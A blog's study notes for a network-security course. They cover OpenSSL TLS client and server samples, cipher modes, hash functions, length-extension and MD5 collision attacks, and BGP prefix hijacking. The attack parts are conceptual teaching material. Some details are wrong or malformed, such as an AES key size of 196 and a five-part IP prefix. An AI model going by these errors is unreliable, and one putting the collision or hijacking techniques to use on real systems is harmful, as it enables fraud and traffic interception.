	exit(0);
   }
   ssl = SSL_new (ctx);

   X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
   X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);

   return ssl;
}


int setupTCPClient(const char* hostname, int port)
{
   struct sockaddr_in server_addr;

   // Get the IP address from hostname
   struct hostent* hp = gethostbyname(hostname);

   // Create a TCP socket
   int sockfd= socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

   // Fill in the destination information (IP, port #, and family)
   memset (&server_addr, '\0', sizeof(server_addr));
   memcpy(&(server_addr.sin_addr.s_addr), hp->h_addr, hp->h_length);
//   server_addr.sin_addr.s_addr = inet_addr ("10.0.2.14");
   server_addr.sin_port   = htons (port);
   server_addr.sin_family = AF_INET;

   // Connect to the destination
   connect(sockfd, (struct sockaddr*) &server_addr,
           sizeof(server_addr));

   return sockfd;
}


int main(int argc, char *argv[])
{
   char *hostname = "yahoo.com";
   int port = 443;

   if (argc > 1) hostname = argv[1];
   if (argc > 2) port = atoi(argv[2]);

   /*----------------TLS initialization ----------------*/
   SSL *ssl   = setupTLSClient(hostname);

   /*----------------Create a TCP connection ---------------*/
   int sockfd = setupTCPClient(hostname, port);

   /*----------------TLS handshake ---------------------*/
   SSL_set_fd(ssl, sockfd);
   int err = SSL_connect(ssl); CHK_SSL(err);
   printf("SSL connection is successful\n");
   printf ("SSL connection using %s\n", SSL_get_cipher(ssl));

   /*----------------Send/Receive data --------------------*/
   char buf[9000];
   char sendBuf[200];
   sprintf(sendBuf, "GET / HTTP/1.1\nHost: %s\n\n", hostname);
   SSL_write(ssl, sendBuf, strlen(sendBuf));

   int len;
   do {
     len = SSL_read (ssl, buf, sizeof(buf) - 1);
     buf[len] = '\0';
     printf("%s\n",buf);
   } while (len > 0);
}

Sample server

#include <arpa/inet.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <netdb.h>
#include <unistd.h>

#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }

int  setupTCPServer();                   // Defined in Listing 19.10
void processRequest(SSL* ssl, int sock); // Defined in Listing 19.12

int main(){

  SSL_METHOD *meth;
  SSL_CTX* ctx;
  SSL *ssl;
  int err;

  // Step 0: OpenSSL library initialization
  // This step is no longer needed as of version 1.1.0.
  SSL_library_init();
  SSL_load_error_strings();
  SSLeay_add_ssl_algorithms();

  // Step 1: SSL context initialization
  meth = (SSL_METHOD *)TLSv1_2_method();
  ctx = SSL_CTX_new(meth);
  SSL_CTX_set_verify(ctx, SSL_VERIFY_NONE, NULL);
  // Step 2: Set up the server certificate and private key
  SSL_CTX_use_certificate_file(ctx, "./cert_server/server-cert.pem", SSL_FILETYPE_PEM);
  SSL_CTX_use_PrivateKey_file(ctx, "./cert_server/server-key.pem", SSL_FILETYPE_PEM);
  // Step 3: Create a new SSL structure for a connection
  ssl = SSL_new (ctx);

  struct sockaddr_in sa_client;
  size_t client_len;
  int listen_sock = setupTCPServer();

  while(1){
    int sock = accept(listen_sock, (struct sockaddr*)&sa_client, &client_len);
    if (fork() == 0) { // The child process
       close (listen_sock);

       SSL_set_fd (ssl, sock);
       int err = SSL_accept (ssl);
       CHK_SSL(err);
       printf ("SSL connection established!\n");

       processRequest(ssl, sock);
       close(sock);
       return 0;
    } else { // The parent process
        close(sock);
    }
  }
}


int setupTCPServer()
{
    struct sockaddr_in sa_server;
    int listen_sock;

    listen_sock= socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    CHK_ERR(listen_sock, "socket");
    memset (&sa_server, '\0', sizeof(sa_server));
    sa_server.sin_family      = AF_INET;
    sa_server.sin_addr.s_addr = INADDR_ANY;
    sa_server.sin_port        = htons (4433);
    int err = bind(listen_sock, (struct sockaddr*)&sa_server, sizeof(sa_server));
    CHK_ERR(err, "bind");
    err = listen(listen_sock, 5);
    CHK_ERR(err, "listen");
    return listen_sock;
}

void processRequest(SSL* ssl, int sock)
{
    char buf[1024];
    int len = SSL_read (ssl, buf, sizeof(buf) - 1);
    buf[len] = '\0';
    printf("Received: %s\n",buf);

    // Construct and send the HTML page
    char *html =
	"HTTP/1.1 200 OK\r\n"
	"Content-Type: text/html\r\n\r\n"
	"<!DOCTYPE html><html>"
	"<head><title>Hello World</title></head>"
	"<style>body {background-color: black}"
	"h1 {font-size:3cm; text-align: center; color: white;"
	"text-shadow: 0 0 3mm yellow}</style></head>"
	"<body><h1>Hello, world!</h1></body></html>";
    SSL_write(ssl, html, strlen(html));
    SSL_shutdown(ssl);  SSL_free(ssl);
}

Q&A
- Which line of client code verifies the validity of server certificate?
  
  Answer: It’s the following lines of code:
```
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
   if(SSL_CTX_load_verify_locations(ctx,NULL, CA_DIR) < 1){
	printf("Error setting the verify locations. \n");
	exit(0);
}
```
  The SSL_VERIFY_PEER option enforces the certificate check. On the server side, this is usually SSL_VERIFY_NONE because most TLS clients do not have a certificate.
- How does the client guarantee that the server is the owner of the certificate?
  
  Answer: Server verifies that it is the owner of the certificate by having the correct private key corresponding to the public key in the certificate. If the server does not have the correct private key, when client sends the pre-master secret during the TLS handshake, the server won’t decrypt it correctly, and won’t calculate the correct session key.
- Which line of client code verifies if the server is the intended server?
  
  Answer: it’s the common name check.
```
X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);
```
- Which line of client code forces TLS handshake to stop if verification fails? Answer: It’s the verify_callback function. If the certificate verification fails, it will return preverify_ok, which has a value indicating verification failure. This will stop TLS handshake.

Case studies
- Usually, when a user connects to a server with TLS, the user provides the domain name of the server, and the actual IP address of the server is acquired by DNS. What if a user tries to connect to a server given an IP address? Is it going to be secure?
  
  Answer: No! Because in this case, both domain name and certificate will be provided by the attacker. As a result, the common name check can be broken!
- Even if the IP is genuine, the approach above is still insecure. Because attacker can sniff your traffic and spoof reverse DNS lookup result as well as their own certificate to the user. In this way, the attacker can decrypt your traffic.
  
  However, if you are trying to reach a server with domain name, you are forcing the other server to provide a valid certificate that has a matching common name. Usually, this is not doable unless the other side is indeed the desired one.

Secret-key Encryption

Common ciphers
- Monoalphabetic substitution cipher (can be broken w/ frequency analysis)
- Polyalphabetic substitution cipher
- DES (key size=56 bits, block size=64 bits), AES (key size=128,196… bits, block size=128 bits)
Attack models
- Ciphertext attack: the attacker only knows the ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Plaintext attack: the attacker knows both plaintext and ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
- Chosen plaintext attack: the attacker can choose a specific plaintext and obtain its corresponding ciphertext. If this does not lead to leakage of further information, the encryption is considered secure.
Encryption modes
- Electronic Codebook Mode (ECB)
  
  The problem of this encryption mode is the lack of diffusion: identical plaintext will result in identical ciphertext, which means the structure of plaintext can be leaked.
- Cipher Block Chaining (CBC)
  
  In this mode, decryption can be done in parallel if all ciphertext blocks are available. However, encryption cannot be done in parallel because the output of a ciphertext block depends on the previous one.
  
  The initialization vector (IV) is used to ensure same plaintext will not generate the same ciphertext. IV is not considered a secret: it can be released without damage.
  - Question: Suppose during the transmission, the fifth bit of the second ciphertext block is corrupted. How many data loss will we face? Answer: we will lose the entire second block as well as the fifth bit of the third block.
- Cipher Feedback (CFB)
  
  This is similar to CBC. One important property of CFB is that we have turned a block cipher into a stream cipher, that is, we can do encryption and transmission bit by bit.
- Output Feedback (OFB)
  
  This mode is similar to CFB, except that the data is fed into the next block before XOR operation. This allows encryption to be parallelizable without waiting for the plaintext. OFB also has stream cipher property. It is essentially using a cipher as random number generator.
- Counter Mode (CTR)
  
  Counter mode works with a nounce and block counter. Obviously, both encryption and decryption can be done in parallel. Like IV, nounce does not necessary need to be kept secret.
Modes that do not require padding: CFB, OFB, CTR (effectively stream ciphers)
Initialization Vectors and common mistakes

IVs are not necessarily secrets. However, this does not mean that we can select them at will. If we do not follow certain rules, this will result in severe security flaws. We discuss the following scenarios provided that the encryption key stays the same.
- Common mistake: using the same IV
  
  A basic requirement for IV is uniqueness, which means no IV should be reused under the same key. For some cipher modes, reusing IV can be catastrophic. In OFB, the use of static IV will make the encryption scheme vulnerable to known plaintext attack. If the attacker knows both plaintext and ciphertext, the attacker will be able to decrypt all subsequent ciphertext, if the IV is reused. That is because the output of OFB will always be the same if the key and IV are identical.
- Common mistake: using predictable IV
  
  If the IV is predictable, it will create security flaw in some encryption modes, e.g. CBC. Using predictable IV will make CBC susceptible to chosen plaintext attack. There are three assumptions under this scenario:
  1. The IV used for next message is predictable.
  2. CBC is used.
  3. The victim will encrypt any plaintext the attacker provides.
  Then the attacker can guess what message was sent by the victim. He can do XOR operation to his plaintext with the previous IV and next IV, and then he can compare the resulting ciphertext to deduce if the previous plaintext is the same, just as it is shown below.

One-way Hash Function

What hash functions do: they generate a fixed length digest for a message of arbitrary length.
Properties of a cryptographic hash function

Denote the hash function by $h$.
- One-way: Given a hashed value $v$, it should be difficult to find a message $m$ such that $h(m)=v$.
- Collision resistant: It should be difficult to find two messages $m_1$ and $m_2$ such that $h(m_1) = h(m_2)$.
Case study: the number game

A and B both come up with a number. If the sum is even, then A wins; otherwise B wins.
- The dilemma: anyone that releases his number first loses.
- Dealing the dilemma with a hash function
  1. A chooses his number and sends the hashed value of his number to B.
  2. When B acquires A’s hash value, B can disclose his number to A.
  3. After receiving B’s answer, A reveals his answer. B can verify A indeed chose this number by comparing the hash value.
  - This is fair for A because of one-way property. Given the hash value, it is difficult for B to know what number is chosen by A.
  - This is fair for B because of collision resistant property. Because it is difficult for A to find multiple values that hash to the same value. That is, the value revealed in the third step is indeed the value A chose.
Common hash functions
- The Message Digest (MD) series: MD2, MD4, MD5
  
  MD2 and MD4 are severely flawed and should not be used. The collision-resistant property of MD5 is broken, yet it is still one-way.
- The Secure Hash Algorithm (SHA) series: SHA1, SHA-2, SHA-3
How hash function works

Most hash functions use a similar construction structure called Merkle–Damgård construction. Input data is broken into blocks of fixed size, with a padding added to the last block. Each block and the output of the previous iteration are fed into a compression function; the first iteration uses a fixed value called IV as one of its inputs.

Notice that SHA-3 does not use this structure anymore.
Applications of hash functions
- Integrity verification
  
  If we change a bit in the message, its hash value would be completely different. Therefore, we can use the hash value to determine if a document/file has been modified or not.
- Committing a secret without telling it
  
  One can prove that he knows a specific secret without telling it. He can simply hash the secret and then disclose the hashed value. The one-way proerty makes it almost impossible for others to get the secret given the hashed value. The collision resistant property makes it almost impossible to change the secret without being noticed after disclosing the hashed value.
- Password verification
  
  It’s unwise to save passwords as plaintext because every user will be compromised if the password database is stolen. If we store the hashed value of password instead, due to the one-way property, it is difficult for the attacker to get user’s password.
  - The use of salt
    
    If multiple users have the same password, their hashed value will be the same. To avoid this situation, we usually hash the password concatenated with a random string called salt. This guarantees that the hashed value will not be the same even two users have identical passwords.
  - On Linux, the hashed password is acquired by hashing the password-salt mixture 5000 times. This will slow the hashing process by a factor of 5000, which effectively slows down brute-force attack.
  - None of IV, nounce and salt are necessarily confidential.
- Trusted timestamping
  
  Sometimes we would like to prove we have the copyright of a digital document without publishing it. To do so, we can use a service called trusted timestamping. Basically, instead of publishing the entire digital content, one only publishes the hashed value of the content. He needs to publish the hash value to a printed media or a Time Stamping Authority (TSA). The TSA will sign the hash with their private key to certify its validity.
- Message Authentication Code (MAC)
  
  MAC is used to detect whether the message has been modified or not during transmission. We can use one-way hash functions to implement MAC. Obviosuly, we cannot just use the hash of a message as the MAC, because this allows anyone to forge the MAC. We need to concatenate a secret key with the actual message first, and then compute the hash. As it turns out, whether to put the key before or after the message will affect the security of resulting MAC significantly. $\newcommand{\mac}{\operatorname{Hash}}$$\newcommand{\msum}{\mathbin{\left\lVert\right.}}$
  - Length extension attack
    
    Denote the secret key by $K$ and message by $M$. The correct way to generate MAC is to compute $\mac(M \msum K)$. If one computes MAC by $\mac(K \msum M)$, it will lead to security loopholes!
    
    Review the Merkle–Damgård construction process as below. If the we compute MAC by $\mac(K \msum M)$, it is possible to extend the length of $M$ and generate the correct MAC without knowing what the key is! More concretely, the attacker needs to know padding $P$, then given any message $T$, he can get the MAC by computing $\mac(K \msum M \msum P \msum T)$. This is because the Merkle–Damgård construction process breaks down message into blocks and use the chained compression function technique to compute the output. We the attacker needs to do is to insert $P$ and $T$ into the chain as if they are a complete message.
  - Key-Hash MAC Algorithm (HMAC)
    
    It is really important to avoid rebuilding wheels in cryptography, since the tiniest error can lead to severe security flaws. Almost all existing libraries and algorithms are carefully tweaked to enhance security. There is a well-known algorithm to generate MAC given key and message. We must need to call $\operatorname{HMAC}(K, M)$.
Hash Collision Attacks
- Forging fake public-key certificates
  
  Suppose an attacker can find two certificates that shares the same hash value but with different common names. For example, the first one’s CN is example.com, and the second one’s CN is attacker’s own attacker32.com. Then he can let the CA sign the second version, and he will effectively have a valid certificate for example.com.
  
  This idea can be extended to forging fake signed programs, PDF documents and so on.
- Generating two different files with the same MD5 hash
  
  The tool developed by Marc Stevens can generate two files that share the same MD5 value. The prefix of two files are the same. For example, message one and two are shown as below.
```
$ cat message1.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a200 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d155 5d83 60fb 5f07 fea2  ..Igm..U].`._...

$ cat message2.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a202 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d1d5 5d83 60fb 5f07 fea2  ..Igm...].`._...
```
  The MD5 and SHA-1 sum of these two messages are shown as below.
```
$ md5sum message1.bin message2.bin
008ee33a9d58b51cfeb425b0959121c9 message1.bin
008ee33a9d58b51cfeb425b0959121c9 message2.bin

$ sha1sum message1.bin message2.bin
c6b384c4968b28812b676b49d40c09f8af4ed4cc message1.bin
c728d8d93091e9c7b87b43d9e33829379231d7ca message2.bin
```
  If the hash function happen to use Merkle–Damgård construction, then we can use the length extension technique to append a common suffix to both message1.bin and message2.bin, and the resulting hash value of them will still be the same.
- Generating two programs with the same MD5 hash
  
  We can use the same idea above to generate two programs with the same MD5 hash. Suppose the program is given as follows. Assume the xyz array is filled with 200 'A'’s.
```
#include <stdio.h>
unsigned char xyz[200] = {"..."}; // fill with actual content

int main(){
    int i;
    for(i = 0; i < 200; ++i){
      printf("%x ", xyz[i]);
    }
}
```
  Now, we can locate the xyz array inside the program’s binary, and we can divide the program into three parts:
  1. The prefix (whose length must be a multiple of 64)
  2. The center (whose length must be 128)
  3. The suffix
  The center must be inside array xyz completely since it needs to be filled with arbitrary content without affecting the program’s control logic. We run the MD5 collision generator on prefix+center, and we require the prefix part of two generated messages to be the same. As a result, we are able to come up with two versions of this program, which can be represented by
  1. Version 1: prefix+Q
  2. Version 2: prefix+P
  , where P and Q are different, but both versions have the same hash value. The next step is to use the length extension technique to concatenate the suffix to these two versions. As a result, we have created two programs
  1. Program 1: prefix+Q+suffix
  2. Program 2: prefix+P+suffix
  which have identical hash value but have different data stored in xyz array.
  
  To alter the control logic of program 1 and program 2 in the attacker’s favor, one can check if xyz is still filled with all A’s in later code sections. If xyz is not all A’s, then the program can start to execute some malicious code. That is to say, we can create two programs that have the same hash value, but one is benign and the other one is malicious.

BGP: Border Gateway Protocol

Four types of Autonomous Systems (AS)
- Stub
- Multihomed
- Transit
- Internet Exchange Point (IXP)
BGP speakers

Each AS has one or more BGP speakers to talk to other AS. They would exchange information on where this AS can reach constantly via a BGP session, this is called peering. As a result, a piece of information shared by a single AS can be propagated to the entire Internet.

BGP update

Routing information is updated by prefix advertisement: an AS will announce a specific network prefix is reachable via this AS. For example, AS 11872 can announce prefix 128.230.0.0/16 is reachable.
There can be multiple paths available to a specific prefix. Usually, the AS will only propagate one path to its neighbor. This path is selected by the path selection algorithm.

The path selection algorithm selects a path in the BGP table. A sample BGP table is shown as below.

$ telnet route-views.optus.net.au
route-views.optus.net.au>show bgp
BGP table version is 1098639742, local router ID is 203.202.125.6
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale, m multipath, b backup-path, x best-external
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*  1.0.0.0/24       203.202.143.33                         0 7474 4826 13335 i
*                   202.139.124.130          1             0 7474 4826 13335 i
*                   203.13.132.7            10             0 7474 4826 13335 i
*>                  203.202.143.34                         0 7474 4826 13335 i
*                   192.65.89.161            1             0 7474 4826 13335 i
*> 1.0.4.0/24       203.202.143.33                         0 7474 4826 38803 56203 i
*                   202.139.124.130          1             0 7474 4826 38803 56203 i
*                   203.13.132.7             1             0 7474 4826 38803 56203 i
*                   203.202.143.34                         0 7474 4826 38803 56203 i
*                   192.65.89.161            1             0 7474 4826 38803 56203 i

The selection criteria include:

weight
local preference (larger values indicates higher likelihood to be chosen)
local generated/aggregated
shortest AS length

Path prepending

Suppose an AS is connected to several ISP (all AS themselves), but the AS wants prefers the traffic to go through one particular ISP, while others are reserved as backups. The AS can enforce this preference by doing path prepending: he can intentionally repeat this own AS number multiple times to increase the AS length of AS path.
Besides updates, withdraw messages can be propagated as well.

Interior BGP (IBGP): the protocol used for BGP speakers inside one AS to communicate internally.
Interior Gateway Protocol (IGP): a type of protocol used for exchanging routing information between gateways (commonly routers) within an autonomous system.

Examples:
- Routing Information Protocol (RIP)
- Open Shortest Path First (OSPF)
Overlapping routes

When an IP address match with multiple entries on BGP table, the one with longest match is selected.

Overlapping routes can be used to achieve:
- Globalization: split subnets into multiple geographic locations in the world.
- Load balancing: allocate each subnet to a BGP entry
IP Anycast

To achieve load balancing, there are two approaches:
- Use domain name: dynamic DNS can assign different IP addresses for loading balancing
- Use IP anycast: all machines have the same IP address, you only need to reach one of them that has the best AS path.
- IP anycast is usually used for stateless services/short connections.
Prefix hijacking attack

Suppose you want to hijack 128.230.0.0/16. What you need to do is to announce two new entries
```
128.230.0.0/17
128.230.128.0.0/17
```
, and then all traffic to 128.230.0.0/16 will be diverted to you.
BGP Protection
- Encryption
- TTL Security: because BGP speakers are physically connected, they can set packet TTL to 255. If packet comes from a remote host, it is impossible for TTL to be 255.
- Filtering: filter prefix updates and paths.

Alan Xiang's Blog